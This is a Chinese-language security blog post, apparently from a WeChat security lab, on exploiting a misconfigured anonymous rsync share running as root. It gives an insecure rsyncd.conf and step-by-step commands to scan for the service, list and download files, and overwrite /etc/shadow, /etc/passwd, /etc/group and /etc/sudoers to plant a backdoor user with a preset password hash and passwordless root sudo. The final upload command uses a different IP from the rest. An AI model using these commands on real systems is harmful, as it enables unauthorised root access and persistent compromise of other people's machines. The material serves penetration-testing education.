浅谈利用rsync服务的攻击

        本文将根据针对Linux操作系统上不安全的Rsync配置，浅谈如何利用rsync服务进行攻击。

1、什么是RSYNC？

        远程访问通过Rsync共享的目录需要两件事，文件共享访问和文件权限。

Rsync的配置方式如下：

        1. 可以在/etc/Rsyncd.conf中定义“ 文件共享访问”， 以提供匿名或经过身份验证的访问。

rsyncd.conf文件的示例，该文件允许匿名root用户访问整个文件系统：

motd file = /etc/Rsyncd.motdlock file = /var/run/Rsync.locklog file = /var/log/Rsyncd.logpid file = /var/run/Rsyncd.pid

[files]path = /comment = Remote file share.uid = 0gid = 0read only = nolist = yes

2、对目标站点进行nmap扫描rsync服务

        rsync服务默认在873端口监听。通过nmap发现开启rsync服务

nmap 10.10.10.134

列举目录和文件

列举目录    rsync 10.10.10.134    列举子目录内容    rsync 10.10.10.134::files    递归列出目录和文件    rsync -r 10.10.10.134::files/tmp/    下载文件夹    rsync -r 10.10.10.134::files/home/test/    通过RSYNC上传文件    使用Rsync上传文件的命令。。    上传文件    rsync ./myfile.txt 10.10.10.134::files/home/test    上载文件夹    rsync -r ./myfolder 10.10.10.134::files/home/test    通过Rsync创建新用户

        如果rsync配置为以root身份运行并且可以匿名访问，则可以通过直接修改shadow，passwd，group和sudoers文件来创建新的特权Linux用户。

注意：相同的通用方法可用于提供对操作系统的完全写入访问权限的任何漏洞。其他一些示例包括NFS导出和上载以root用户身份运行的Web Shell。

通过rsync创建新用户

    创建主目录让我们从创建新用户的主目录开始。

# Create local work directoriesmkdir demomkdir backupcd demo # Create new user’s home directorymkdir ./myuserrsync -r ./myuser 10.10.10.134::files/home

shadow文件

/etc /shadow文件是Linux密码文件，其中包含用户信息，例如主目录和加密密码。它只能由root访问。

要通过rsync注入新的用户，必须：

    1. 生成密码。

    2. 下载/ etc / shadow。（备份）

    3. 将新用户追加到/ etc /shadow的末尾

    4. 上传/覆盖现有的/ etc /shadow

    注意：确保创建系统上新用户。 

创建加密密码：

openssl passwd -crypt password123将新用户条目添加到/ etc / shadow：rsync -R 10.10.10.134::files/etc/shadow .cp ./etc/shadow ../backupecho "myuser:MjHKz4C0Z0VCI:17861:0:99999:7:::" >> ./etc/shadowrsync ./etc/shadow 10.10.10.134::files/etc/

passwd文件

/ etc / passwd文件用于跟踪有权访问系统的注册用户。它不包含加密的密码。所有用户都可以阅读。

要通过rsync注入新的用户条目，您必须：

    1. 创建要注入的用户条目。

    2. 下载/ etc / passwd。（并备份它，以便以后可以恢复状态）

    3. 将新用户条目追加到passwd的末尾。

    4. 上传/覆盖现有的/ etc / passwd

注意：可以随意更改为uid，但请确保它与/ etc / group文件中设置的值匹配。在这种情况下，UID / GUID为1021。

将新用户条目添加到/ etc / passwd：rsync -R 10.10.10.134::files/etc/passwd .cp ./etc/passwd ../backupecho "myuser:x:1021:1021::/home/myuser:/bin/bash" >> ./etc/passwdrsync ./etc/passwd 10.10.10.134::files/etc/

将新用户添加到用户组当中

/ etc / group文件用于跟踪系统上已注册的组信息。它不包含加密的密码。所有用户都可以阅读。

要通过rsync注入新的用户条目，您必须：

1. 创建要注入的用户条目。

2. 下载/ etc / group。（和备份，以防万一）

3. 将新用户条目追加到组末尾。

4. 上传/覆盖现有的/ etc / group文件。

注意：可以随意更改为uid，但请确保它与/ etc / passwd文件中设置的值匹配。在这种情况下，UID / GUID为1021。将新用户条目添加到/ etc / group：

rsync -R 10.10.10.134::files/etc/group .cp ./etc/group ../backupecho "myuser:x:1021:" >> ./etc/grouprsync ./etc/group 10.10.10.134::files/etc/

创建sudoers

文件目录/ etc / sudoers文件包含允许使用sudo命令以root用户身份运行命令的用户列表。它只能由root读取。我们将对其进行修改，以允许新用户通过sudo执行任何命令。

要通过rsync注入条目,前提条件：

    1. 创建要注入的用户条目。

    2. 下载/ etc / sudoers。（和备份，以防万一）

    3. 将新用户条目追加到sudoers的末尾。

    4. 上传/覆盖现有的/ etc / sudoers文件。

将新用户条目添加到/ etc / sudoers：

rsync -R 10.10.10.134::files/etc/sudoers .cp ./etc/sudoers ../backupecho "myuser ALL=(ALL) NOPASSWD:ALL" >> ./etc/sudoers   rsync ./etc/sudoers 192.168.1.171::files/etc/

然后，只需使用新创建的用户通过SSH连接，执行sudo root就完成了。

手握日月摘星辰，安全路上永不止步。

                                                   - Khan攻防安全实验室

本文始发于微信公众号（Khan安全攻防实验室）：浅谈利用rsync服务的攻击